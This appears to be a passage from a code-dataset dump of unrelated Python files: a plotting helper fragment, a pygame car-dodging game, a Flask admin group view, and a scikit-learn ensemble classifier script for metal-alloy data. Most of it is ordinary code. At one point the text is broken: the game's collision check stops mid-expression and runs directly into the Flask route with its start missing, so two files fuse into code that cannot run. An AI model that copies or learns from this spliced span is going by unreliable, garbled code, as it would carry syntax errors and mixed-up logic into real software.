f_name: str\n :return: None (saves to folder)\n \"\"\"\n assert self.Q_Matrix is not None, \\\n \"Call get_q_matrix before using this function\"\n\n plotter = Plotting.Plotting_tracks()\n plotter.plot_grid(matrix=self.Q_Matrix,\n name=f_name,\n folder='Q_Matrix_Plots')\n\n def get_details(self, ):\n \"\"\"\n Get basic metrics about the States\n\n :return: dict\n \"\"\"\n assert self.Q is not None, \\\n \"Call get_q_matrix before using this function\"\n\n min_q = min(self.Q.values())\n max_q = max(self.Q.values())\n data = self.Q.values()\n q_data = dict(min=min_q,\n max=max_q,\n data=data)\n\n return q_data\n","sub_path":"Model/Plotting.py","file_name":"Plotting.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333300030","text":"import pygame\nimport time\nimport random\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\nblack = (0, 0, 0)\nwhite = (255,255,255)\nred = (255,0,0)\ncar_width = 53\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('Cross The Street')\nclock = pygame.time.Clock()\nCarimg = pygame.image.load('Car.png')\ndef score_count(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"SCORE: \"+str(count),True, red)\n gameDisplay.blit(text,(0,0))\ndef Car(x,y):\n gameDisplay.blit(Carimg,(x,y))\n\ndef blocks(thingx, thingy, thingw, thingh, color):\n pygame.draw.rect(gameDisplay, color, [thingx,thingy,thingw,thingh])\n\n\n\ndef crash():\n message_display('Crash')\ndef message_display(text):\n largeText = pygame.font.Font('freesansbold.ttf', 115)\n TextSurf, TextRect = text_objects(text,largeText)\n TextRect.center = ((display_width/2),(display_height/2))\n gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n time.sleep(2)\n game_loop()\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\n def things(thingx, thingy, thingw, thingh, color):\n pygame.draw.rect(gameDisplay, color, [thingx,thingy,thingw,thingh])\n \n\n \ndef game_loop():\n x = display_width*0.45\n y = display_height*0.8\n x_change = 0\n thing_startx = random.randrange(0,display_width)\n thing_starty = -600\n thing_speed = 4\n thing_width = 100\n thing_height = 100\n score = 0\n crashed = False \n while not crashed:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x_change = -100\n elif event.key == pygame.K_RIGHT:\n x_change = 100\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n x_change=0\n x+=x_change\n gameDisplay.fill(white)\n blocks(thing_startx, thing_starty, thing_width, thing_height, black)\n thing_starty += thing_speed\n Car(x,y)\n score_count(score)\n \n if x>(display_width-car_width) or x<0:\n crash()\n if thing_starty > display_height:\n thing_starty = 0-thing_height\n thing_startx = random.randrange(0, display_width)\n score+=1\n thing_speed += 1\n thing_width += (score+1.2)\n if y < thing_starty+thing_height:\n #log message\n print('past y')\n if x > thing_startx and x < thing_startx + thing_width or x+car_width> thing_startx and x+car_width', methods=['GET', 'PUT', 'DELETE'])\n@jwt_required()\n@intercept_admin_user\ndef item(id):\n if request.method == 'GET':\n try:\n item = get_group(id, True)\n return default_return(200, 2, item)\n except Exception as e:\n raise e\n\n if request.method == 'PUT':\n try:\n item = update_group(id, True)\n return default_return(200, 3, item)\n except Exception as e:\n raise e\n\n if request.method == 'DELETE':\n try:\n delete_group(id)\n return default_return(204, 4)\n except Exception as e:\n raise e\n\n\n@bp.route('', methods=['GET', 'POST'])\n@jwt_required()\n@intercept_admin_user\ndef items():\n if request.method == 'GET':\n try:\n items, items_paginate = gets_group(True)\n return default_return(200, 2, items, items_paginate)\n except Exception as e:\n raise e\n\n if request.method == 'POST':\n try:\n item = create_group(schema=True)\n return default_return(201, 1, item)\n except Exception as e:\n raise e\n","sub_path":"sensi-backend-init/app/admin/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"118153964","text":"# CBC Classifier\nfrom time import gmtime, strftime\ngmt=strftime(\"%H:%M:%S\", gmtime())\nprint(gmt)\n\n#def CBC(dataFile,multiDatafile=True,rowIndex=None,columnIndex=None,numClasses=None,numFeatures=None,numTests=None):\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport time\nstart = time.time()\nimport numpy as np\nimport xlrd\nfrom sklearn.model_selection import train_test_split\n#from sklearn.preprocessing import scale\n#import matplotlib.pyplot as plt\n#from mpl_toolkits.mplot3d import Axes3D name 'range' is not defined \n# \nimport os\nmultiDatafile=True\nforcePrediction=True\n# dataFile='Iris'\nnumTests=20\ndataFile = '/Users/admin/Desktop/Files_for_Bhaskar/Classifier/ARPA_Metals/100_Data' \n# dataFile = '/Users/admin/Desktop/Bracket'\n# dataFile = '/Users/admin/Desktop/Desktop_Stuff/NFL'\nfile_used='Metals'\n# print('NFL')\nnumClasses=28 # metals=28, bracket=2, NFL=2 & off for iris and digits\nnumFeatures=6 # metals=6, bracket=20, NFL=22 & off for iris and digits\nrowIndex=2 # metals=2, bracket=1, NFL=37 & off for iris and digits\ncolumnIndex=1 # metals=1, bracket=2, NFL=1 & off for iris and digits\nif multiDatafile:\n dataPaths=[]\n for root,dirs,files in os.walk(dataFile):\n for name in files:\n dataPaths.append(os.path.join(root,name)) \n for paths in dataPaths:\n if paths.endswith('.xlsx'):\n continue\n else:\n dataPaths.remove(paths)\n dataPaths=np.sort(dataPaths)\n\n readings=0\n readings1=[]\n classes=[]\n class_name=[]\n n_samples=[]\n data_ws=[]\n \n # Each class must have its own data file. Based on current filename used below, \n # each file would be named Book1_new0, Book1_new1,... and so forth\n \n # This code reads Excel files only\n # File location will change for each computer \n for i in range(numClasses):\n data_wb = xlrd.open_workbook(dataPaths[i])\n index = 0 # This value corresponds to the worksheet within each Excel file \n # where the dataset can be found, where 0 corresponds to the first worksheet. \n # All files must have data on the same worksheet index\n data_ws.append(data_wb.sheet_by_index(index)) # Combines each datafile into \n # one file (data_ws)\n col_values= data_ws[i].col_values(0)\n \n \n # <_____**** USER INPUT ****_____>: how many rows and columns need to be skipped \n # before the dataset begins, i.e. for rows that may include header \n # information or columns that may include sample numbers\n # numTests = how many \"new data\" tests should be taken from each class\n\n \n # The next step creates a list of alloy names from header information \n # found in each data file \n \n # <_____**** USER INPUT ****_____>: \"(0,1)\" corresponds to 1st row, 2nd column, and may \n # need to be altered depending on where the class label is located in the worksheet. \n classes.append(data_ws[i].cell(0,1).value)\n \n # Calculates number of samples for each class excluding those \n # used for \"new data\" validation (n_samples), the number of samples for each\n # class including those used for \"new data\" (readings1) and the total number of \n # samples for all classes combined (readings)\n n_samples.append(len(col_values)-rowIndex-numTests)\n readings1.append(n_samples[i]+numTests)\n readings += (n_samples[i]+numTests)\n \n # Creates data array with just the dataset values (no header information or skipped rows/columns) \n classes=np.sort(classes)\n for i in range(numClasses):\n class_name.append([i,str(classes[i])])\n prev=0\n data_all1=np.zeros((readings,numFeatures))\n color=np.zeros((readings,1))\n for i in range(numClasses):\n for j in range(readings1[i]):\n for k in range(numFeatures):\n data_all1[j+prev,k]=data_ws[i].cell(rowIndex+j,k+columnIndex).value\n color[j+prev,0]=i\n prev += readings1[i]\n \n # rg loop below performs 10 iterations of random permutations of the dataset. This is done in order\n # to verify that there is no data drift, i.e., where all of the samples at the\n # beginning of the dataset might be similar to one another but slightly different than\n # all of the samples at the end of the dataset\n rg=0 \n data_rand=[]\n prev=0\n for i in range(numClasses):\n rng = np.random.RandomState(rg)\n permutation=rng.permutation(int(readings1[i]))\n data_all2=data_all1[prev:prev+int(readings1[i])]\n data_rand.append(data_all2[permutation])\n prev += int(readings1[i])\n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n prev=0\n data=np.zeros((ncs,numFeatures))\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_rand[i][j][k]\n prev += int(n_samples[i])\n\n # Generates class numbers that will be used as targets during testing \n targets=[]\n for i in range(numClasses): \n for j in range(int(n_samples[i])):\n targets.append(i)\n targets=np.array(targets)\n \n # Creates \"new data\" array for validation \n prev=0\n new_data=np.zeros((numClasses*numTests,numFeatures))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_rand[i][int(n_samples[i])+j][k]\n prev += int(readings1[i])\n\n# Generates class numbers that will be used as targets for new data\n new_targets_num=[]\n for i in range(numClasses):\n for j in range(numTests):\n new_targets_num.append(class_name[i][0])\n \nelif dataFile == \"Iris\":\n from sklearn import datasets\n iris = datasets.load_iris()\n data_all1 = iris.data\n targets_all1 = iris.target\n numClasses = len(np.unique(targets_all1))\n numFeatures = len(data_all1[0])\n readings1 = np.zeros(numClasses)\n n_samples = np.zeros(numClasses)\n \n class_name=[]\n data_all=[]\n targets_all=[]\n for i in range(numClasses):\n data_all2=[]\n targets_all2=[]\n for j in range(len(targets_all1)):\n if targets_all1[j] == np.unique(targets_all1)[i]:\n readings1[i] += 1\n data_all2.append(data_all1[j])\n targets_all2.append(targets_all1[j])\n data_all.append(data_all2)\n targets_all.append(targets_all2)\n n_samples[i] = int(readings1[i]) - numTests\n class_name.append([i,iris.target_names[i]]) \n\n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n data=np.zeros((ncs,numFeatures))\n targets=np.zeros((ncs,1))\n prev=0\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_all[i][j][k]\n targets[j+prev]=int(targets_all[i][j])\n prev += int(n_samples[i])\n data=list(data)\n targets=list(targets)\n \n new_data=np.zeros((numClasses*numTests,numFeatures))\n new_targets_num=np.zeros((numClasses*numTests,1))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_all[i][int(n_samples[i])+j][k]\n new_targets_num[j+i*numTests]=targets_all[i][int(n_samples[i])+j]\n new_data=list(new_data)\n new_targets_num=list(new_targets_num) \n \n \nelif dataFile == \"Digits\":\n from sklearn import datasets\n digits = datasets.load_digits()\n targets_all1 = digits.target\n totalSamples = len(targets_all1)\n numClasses = len(np.unique(targets_all1))\n data_all1 = digits.images.reshape((totalSamples,-1))\n \n numFeatures = len(data_all1[0])\n readings1 = np.zeros(numClasses)\n n_samples = np.zeros(numClasses)\n class_name=[]\n data_all=[]\n targets_all=[]\n for i in range(numClasses):\n data_all2=[]\n targets_all2=[]\n for j in range(len(targets_all1)):\n if targets_all1[j] == np.unique(targets_all1)[i]:\n readings1[i] += 1\n data_all2.append(data_all1[j])\n targets_all2.append(targets_all1[j])\n data_all.append(data_all2)\n targets_all.append(targets_all2)\n n_samples[i] = int(readings1[i]) - numTests\n class_name.append([i,digits.target_names[i]]) \n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n data=np.zeros((ncs,numFeatures))\n targets=np.zeros((ncs,1))\n prev=0\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_all[i][j][k]\n targets[j+prev]=int(targets_all[i][j])\n prev += int(n_samples[i])\n data=list(data)\n targets=list(targets)\n \n new_data=np.zeros((numClasses*numTests,numFeatures))\n new_targets_num=np.zeros((numClasses*numTests,1))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_all[i][int(n_samples[i])+j][k]\n new_targets_num[j+i*numTests]=targets_all[i][int(n_samples[i])+j]\n new_data=list(new_data)\n new_targets_num=list(new_targets_num) \n\nend = time.time()\nelapsed_time = end-start\nprint(\"Data formatting done in %0.1f seconds\" % elapsed_time)\n \n\n\n# <_____**** USER INPUT ****_____>: After verification that no drift is present, \"rg in range(10)\" can be\n# replaced with \"rg in range(1)\" in order to eliminate unnecessary computations\n\n\n ############### MODEL BUILDER ###################\n \nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier, BaggingClassifier,ExtraTreesClassifier,GradientBoostingClassifier,VotingClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.svm import SVC\n\n# Calculates Centroids for each class (C0_samples) that will be used\n# for initial guesses for KMeans\nmean_samples=np.zeros((numClasses,numFeatures)) \nC0_samples=np.zeros((numClasses,numFeatures))\nds=[]\ndata_s=[]\nprev=0\ndata_samples=[ds]*numClasses\nfor i in range(numClasses):\n data_samples[i]=[ds]*numFeatures\n for k in range(numFeatures):\n for j in range(int(n_samples[i])):\n data_s.append(data[j+prev][k])\n data_samples[i][k]=data_s\n data_s=[]\n data_samples[i][k]=np.array(data_samples[i][k]).astype(float)\n mean_samples[i,k]=float(np.mean(data_samples[i][k]))\n C0_samples[i,k]=mean_samples[i][k]\n prev += int(n_samples[i])\n\n# <_____**** USER INPUT ****_____>: Create any number of classifiers you wish to test. \n# Parameters for each classifier can be altered at the user's discretion \n\n# When there is a tie in Test Data Accuracy (PF Value) the ensemble picks whichever\n# one is listed higher here, so I usually look at what the best individual classifier would be,\n# i.e. best_ind_classifier, and list it as classifier1 \n\n# Combines all classifiers into one list\nclassifier1=BaggingClassifier(base_estimator=RandomForestClassifier(random_state=0),random_state=0)\nclassifier1_name = 'Bagging'\n\nclassifier2=RandomForestClassifier(random_state=0)\nclassifier2_name = 'Random Forest'\n\nclassifier3=KNeighborsClassifier(n_neighbors=3)\nclassifier3_name = 'KNeighbors'\n\nclassifier4=DecisionTreeClassifier(random_state=0)\nclassifier4_name = 'Decision Tree'\n\nclassifier5=GaussianNB()\nclassifier5_name = 'Gaussian Naive Bayes'\n\nclassifier6=QuadraticDiscriminantAnalysis()\nclassifier6_name = 'Quadratic Discriminant Analysis'\n\nclassifier7=LinearDiscriminantAnalysis()\nclassifier7_name = 'Linear Discriminant Analysis'\n\nclassifier8=SVC(kernel='linear',gamma=0.001,random_state=0,probability=True)\nclassifier8_name = 'SVC'\n\nclassifier9=ExtraTreesClassifier(random_state=0)\nclassifier9_name = 'Extra Trees'\n\nclassifier10=KMeans(n_clusters = numClasses,init=C0_samples, random_state=0)\nclassifier10_name = 'KMeans'\n\nclassifier11=GradientBoostingClassifier(random_state=0)\nclassifier11_name = 'Gradient Boosting'\n\nclassifier12=AdaBoostClassifier(base_estimator=RandomForestClassifier(random_state=0),random_state=0)\nclassifier12_name='AdaBoost'\n#\nclassifier13=VotingClassifier(\n estimators=[('bag', classifier1),('rf', classifier2),('knn', classifier3),('dt', classifier4),\n ('gnb', classifier5),('qda', classifier6),('lda',classifier7),('svc', classifier8),('ext', classifier9),\n ('gb', classifier11),('ada', classifier12)\n ],\n voting='soft'\n )\n#classifier13=VotingClassifier(\n# estimators=[('rf', classifier2),('svc', classifier8),('lda',classifier7)],\n# voting='soft'\n# )\nclassifier13_name = 'Voting'\n\n\n# classifier=[classifier1,classifier2,classifier3,classifier4,classifier5,\n# classifier6,classifier7,classifier8,classifier9,classifier10,classifier11,classifier12,classifier13]\n# classifier_name=[classifier1_name,classifier2_name,classifier3_name,classifier4_name,\n# classifier5_name,classifier6_name,classifier7_name,classifier8_name,\n# classifier9_name,classifier10_name,classifier11_name,classifier12_name,classifier13_name] \n\nclassifier=[classifier1,classifier2,classifier3,classifier4,classifier5,\n classifier6,classifier7,classifier9,classifier10,classifier11,classifier12]\nclassifier_name=[classifier1_name,classifier2_name,classifier3_name,classifier4_name,\n classifier5_name,classifier6_name,classifier7_name,\n classifier9_name,classifier10_name,classifier11_name,classifier12_name] \n\n# classifier=[classifier1]\n# classifier_name=[classifier1_name]\n\n##################### CLASSIFIER LOOPER ########################\ncurrent_t = time.time()\nct = current_t - start\nprint(\"classifier loop start - %0.1f seconds\" % (ct))\n# This section loops through all classifiers at all chosen training/testing\n# splits for various random state splittings and finds the best classifier\n# and optimal T/T split for each class within the dataset\n\n# <_____**** USER INPUT ****_____>: Training size range for Training/Testing Split \n# can be altered below. If you want to keep T/T split constant, simply\n# make the train_size_min and train_size_max values the same at the percentage\n# of the dataset for which you want to train your algorithms on \n\nfrom sklearn.model_selection import cross_val_score\nm=[]\nmetrics1=[]\ntrain_size_min=.8 #*\ntrain_size_max=.8 #*\ntest_class_pf_clf=[]\ntest_class_std_clf=[]\nrs_max_clf=[]\nclf_score=[]\nfor clf in range(len(classifier)):\n test_class_pf_rs_ts=[]\n test_class_std=[]\n rs_max_ts=[]\n for ts in range(int(train_size_min*10),int(train_size_max*10)+1,1):\n test_class_pf_rs=[]\n scores=[]\n for rs in range(5): # <_____**** USER INPUT ****_____>: Changing this value alters the random\n # state that is used to split the data into training and testing\n # data and targets. Changing this value randomly changes which \n # data points get used for training and which get used for testing \n train_size=float(ts)/10\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for i in range(numClasses):\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[i])], targets[prev:prev+int(n_samples[i])], train_size=train_size, random_state=rs)\n prev += int(n_samples[i])\n for j in range(len(train_data)):\n train_data1.append(train_data[j])\n train_targets1.append(train_targets[j])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n \n test_t_indiv_labels=[]\n test_d_indiv_labels=[]\n test_proba=[]\n test_d_indiv_labels_sort=[]\n \n test_target_classes=[]\n pred_target_classes=[]\n test_predictions=[]\n \n clssfr=classifier[clf].fit(train_data, train_targets.ravel())\n scores_rs=cross_val_score(classifier[clf], train_data, train_targets.ravel(), cv=5)\n scores.append(scores_rs.mean())\n for i in range(len(test_data)):\n test_d_indiv_labels.append([class_name[int(clssfr.predict([test_data[i]])[0])][0],i]) \n # test_predictions.append(clssfr.predict([test_data[i]])[0])\n # test_proba.append(clssfr.predict_proba([test_data[i]])[0][int(test_targets[i][0])]) \n for i in range(len(test_targets)):\n test_t_indiv_labels.append([test_targets[i],i])\n \n for a in range(numClasses):\n tt_classes=[]\n pt_classes=[]\n for b in range(len(test_targets)):\n if test_t_indiv_labels[b][0]==a:\n tt_classes.append(test_t_indiv_labels[b])\n if test_d_indiv_labels[b][0]==a:\n pt_classes.append(test_d_indiv_labels[b])\n test_target_classes.append(tt_classes)\n pred_target_classes.append(pt_classes)\n test_class_pf=[]\n for c in range(numClasses):\n total_ti=0\n for d in range(len(pred_target_classes[c])):\n for e in range(len(test_target_classes[c])):\n if test_target_classes[c][e][1]==pred_target_classes[c][d][1]:\n total_ti += 1\n if total_ti > 0:\n test_class_pf.append(float(total_ti)/len(pred_target_classes[c])*100)\n else:\n test_class_pf.append(0)\n # test_class_pf is what we call our Performance Fit value (Accuracy of Test Data used to build ensemble) \n test_class_pf_rs.append(test_class_pf)\n # print(\"--rs %d done\" % rs)\n clf_score.append(np.mean(scores)) \n tcpr=[]\n rs_max1=[]\n for i in range(numClasses):\n tcpr1=[]\n for j in range(len(test_class_pf_rs)):\n tcpr1.append(test_class_pf_rs[j][i])\n tcpr.append(tcpr1)\n rs_max1.append(tcpr1.index(max(tcpr1)))\n rs_max_ts.append(rs_max1)\n test_class_pf_rs1=[[np.mean(x) for x in tcpr]] \n test_class_pf_rs_ts.append(test_class_pf_rs1)\n test_class_std1=[[np.std(x) for x in tcpr]]\n test_class_std.append(test_class_std1)\n # print(\"-t/t split %d done\" % ts)\n rs_max_clf.append(rs_max_ts)\n test_class_pf_clf.append(test_class_pf_rs_ts)\n test_class_std_clf.append(test_class_std)\n current_t = time.time()\n clf_cnt=clf+1\n ct = current_t - start\n print(\"classifier %d done - %0.1f seconds\" % (clf_cnt,ct))\n \ntest_classes_accuracy3=[]\nfor k in range(len(test_class_pf_clf)):\n test_classes_accuracy2=[]\n for i in range(numClasses):\n test_classes_accuracy1=[]\n for j in range(len(test_class_pf_clf[k])):\n for h in range(len(test_class_pf_clf[k][j])):\n test_classes_accuracy1.append(test_class_pf_clf[k][j][h][i]) \n test_classes_accuracy2.append(test_classes_accuracy1) \n test_classes_accuracy3.append(test_classes_accuracy2)\n \nacc_class3=[]\nfor clf in range(len(classifier)):\n acc_class2=[]\n for i in range(numClasses):\n tca3=[]\n if int(round((train_size_max-train_size_min)*10))>0:\n for j in range(int(round((train_size_max-train_size_min)*10))):\n tca3.append(test_classes_accuracy3[clf][i][j+1]-test_classes_accuracy3[clf][i][j])\n if min(tca3)<0:\n acc_class1_max = test_classes_accuracy3[clf][i][int(round((train_size_max-train_size_min)*10))]\n acc_class1_max_ind = j+1\n else:\n acc_class1_max = max(test_classes_accuracy3[clf][i])\n acc_class1_max_ind = test_classes_accuracy3[clf][i].index(acc_class1_max)\n else:\n acc_class1_max = max(test_classes_accuracy3[clf][i])\n acc_class1_max_ind = test_classes_accuracy3[clf][i].index(acc_class1_max)\n acc_class1_split = (acc_class1_max_ind)/10.0+train_size_min\n acc_class2.append([acc_class1_max,acc_class1_split,test_class_std_clf[clf][acc_class1_max_ind][0][i]]) \n acc_class3.append(acc_class2) \n\n#####################\n# best_ind_classifier identifies best individual classifier\nacc_class3_avg=[]\ntest_class_pf_avg=[]\nfor i in range(len(classifier)):\n acc_class3_avg.append(np.mean([x[0] for x in acc_class3[i]]))\n for j in range(int(round((train_size_max-train_size_min)*10))+1):\n test_class_pf_avg.append(np.mean(test_class_pf_clf[i][j][0])) \n # might look at replacing j with int(round((train_size_max-train_size_min)*10)) \nmax_acc_class3_avg=max(acc_class3_avg) \n\np=0\nfor i in acc_class3_avg:\n if max_acc_class3_avg == i:\n p+=1\n#if p>1:\n #need to include tie breaker for when equal accuracies use lowest stddev \n \nmax_acc_class3 = acc_class3[acc_class3_avg.index(max_acc_class3_avg)]\nmax_ind_test_class=test_class_pf_avg.index(max(test_class_pf_avg))\nmax_clf_score = max(clf_score)\nmax_clf_score_index = clf_score.index(max_clf_score)\nbest_ind_classifier = [classifier_name[max_clf_score_index],max_clf_score_index,max_clf_score,train_size_max]\n# best_ind_classifier = [classifier_name[acc_class3_avg.index(max_acc_class3_avg)],acc_class3_avg.index(max_acc_class3_avg),max_acc_class3_avg,float(int(train_size_min*10)+(max_ind_test_class)%((train_size_max-train_size_min)*10+1))/10]\n#####################\n\n# full_ensemble outputs fully generated ensemble classifier.\n# full_ensemble identifies the best classifier at the optimal T/T split and its \n# corresponding PF value for each individual class found in the dataset\nfull_ensemble=[]\nacc_class4_all=[] \nfor i in range(numClasses):\n acc_class4=[]\n acc_class4sp=[]\n acc_class4std=[]\n acc_class4_all1=[] \n for clf in range(len(classifier)): \n acc_class4.append(acc_class3[clf][i][0])\n acc_class4sp.append(acc_class3[clf][i][1])\n acc_class4std.append(acc_class3[clf][i][2])\n acc_class4_all1.append(acc_class3[clf][i])\n acc_class4_all.append(acc_class4_all1)\n acc_class4_max=max(acc_class4)\n acc_class4_max_ind=acc_class4.index(acc_class4_max)\n acc_class4_max_sp = acc_class4sp[acc_class4_max_ind]\n acc_class4_max_std = acc_class4std[acc_class4_max_ind]\n full_ensemble.append([class_name[i][1],classifier_name[acc_class4_max_ind],acc_class4_max_ind,acc_class4_max_sp,float(format(acc_class4_max,'.2f')),float(format(acc_class4_max_std,'.2f'))])\nprint(full_ensemble) \nacc_class6=[]\nfor i in range(len(full_ensemble)):\n acc_class6.append(full_ensemble[i][4])\nacc_test_data=np.mean(acc_class6)\n\n# Prediction Precision = precision of Ensemble on Test Data\nprint('Prediction Precision = %.2f' % acc_test_data)\n\n####################\n#### plots classifier accuracy by train/test split per class \n#max_tt_acc=[]\n#for j in range(numClasses): \n# max_tt_acc.append(test_classes_accuracy3[full_ensemble[j][2]][j])\n#for i in range(numClasses):\n# plt.figure(class_name[i][1])\n# plt.plot([50,60,70,80],max_tt_acc[i])\n# plt.axis([50,80,80,101]) \n# plt.title('%s' % class_name[i][1])\n \n######################## NEW DATA TESTER ##############################\n\n# must uncomment next line if you want to be able to stream in new data online\n# otherwise it will re train everytime\n# def CBC_newData(new_data=new_data,new_targets_num=new_targets_num):\nimport time as tm\nstart_nd=tm.time()\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n#dt2_acc=[] \nnew_data_labels=[] \nnew_data_pred_labels_num=[] \n\n# Loops through the generated ensemble classifier (from full_ensemble), and \n# uses each class's optimal classifier and T/T split to make a prediction \n# on each new data point. Then, if, and only if, a classifier's prediction \n# matches with the class it is associated with then it is stored. \nfor i in range(len(full_ensemble)):\n ts_class=full_ensemble[i][3]\n clf=full_ensemble[i][2]\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[full_ensemble[l][2]][int(round((ts_class-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=ts_class, random_state=rs)\n prev += int(n_samples[l])\n for j in range(len(train_data)):\n train_data1.append(train_data[j])\n train_targets1.append(train_targets[j])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n \n classifier[clf].fit(train_data, train_targets.ravel())\n pred_labels_num=classifier[clf].predict(new_data)\n for j in range(len(pred_labels_num)):\n if pred_labels_num[j]==i:\n new_data_pred_labels_num.append([j,class_name[int(pred_labels_num[j])][1],int(pred_labels_num[j])])\nnew_data_labels=sorted(new_data_pred_labels_num, key=lambda x: x[0])\n\n# If multiple classes' optimal classifiers predict a data point as their own\n# class then they are put in a new shared dataset where tie breakers are applied.\n# If a tiebreaker is ineffective, then the data point is labeled 'RETEST'. \nnew_data_labels_shared=[]\nfor i in range(len(new_data_labels)-1):\n if new_data_labels[i][0]==new_data_labels[i+1][0]:\n new_data_labels_shared.append([i,new_data_labels[i][2],new_data_labels[i+1][2],new_data_labels[i+1][0]])\n#ndls=new_data_labels_shared\nfor j in range(1,len(new_data_labels_shared)+1):\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[best_ind_classifier[1]][int(round((best_ind_classifier[3]-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=best_ind_classifier[3], random_state=rs)\n prev += int(n_samples[l])\n for i in range(len(train_data)):\n train_data1.append(train_data[i])\n train_targets1.append(train_targets[i])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n\n clsfr=classifier[best_ind_classifier[1]].fit(train_data, train_targets.ravel())\n pred_labels_num1=clsfr.predict(np.reshape(new_data[new_data_labels_shared[-j][3]],(1,-1)))\n if forcePrediction:\n if pred_labels_num1[0]==new_data_labels_shared[-j][2]:\n del new_data_labels[new_data_labels_shared[-j][0]]\n else:\n del new_data_labels[new_data_labels_shared[-j][0]+1]\n else:\n if pred_labels_num1[0]==new_data_labels_shared[-j][1]:\n del new_data_labels[new_data_labels_shared[-j][0]+1]\n elif pred_labels_num1[0]==new_data_labels_shared[-j][2]:\n del new_data_labels[new_data_labels_shared[-j][0]]\n else:\n new_data_labels[new_data_labels_shared[-j][0]+1]=[new_data_labels[new_data_labels_shared[-j][0]+1][0],'RETEST','N/A']\n del new_data_labels[new_data_labels_shared[-j][0]] \n\n#creates another shared dataset in the event there was a point with 3 shared labels.\n# A new approach needs to be figured out that can account for an unlimited number\n# of potential shared points. \nnew_data_labels_shared2=[]\nfor i in range(len(new_data_labels)-1):\n if new_data_labels[i][0]==new_data_labels[i+1][0]:\n new_data_labels_shared2.append([i,new_data_labels[i][2],new_data_labels[i+1][2]])\nfor j in range(1,len(new_data_labels_shared2)+1):\n del new_data_labels[new_data_labels_shared2[-j][0]]\n\n# If a data point is never predicted by an optimal classifier as its \n# corresponding class, then it is labeled 'RETEST'\nif forcePrediction:\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[best_ind_classifier[1]][int(round((best_ind_classifier[3]-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=best_ind_classifier[3], random_state=rs)\n prev += int(n_samples[l])\n for i in range(len(train_data)):\n train_data1.append(train_data[i])\n train_targets1.append(train_targets[i])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n\n clsfr=classifier[best_ind_classifier[1]].fit(train_data, train_targets.ravel())\n \n undecided_labels=[]\n for i in range(len(new_data)):\n decision_made=0\n for j in range(len(new_data_labels)):\n if i==new_data_labels[j][0]:\n decision_made=1\n if decision_made==0:\n undecided_labels.append(i)\n for item in undecided_labels:\n tie_breaker_pred=clsfr.predict(np.reshape(new_data[item],(1,-1)))\n 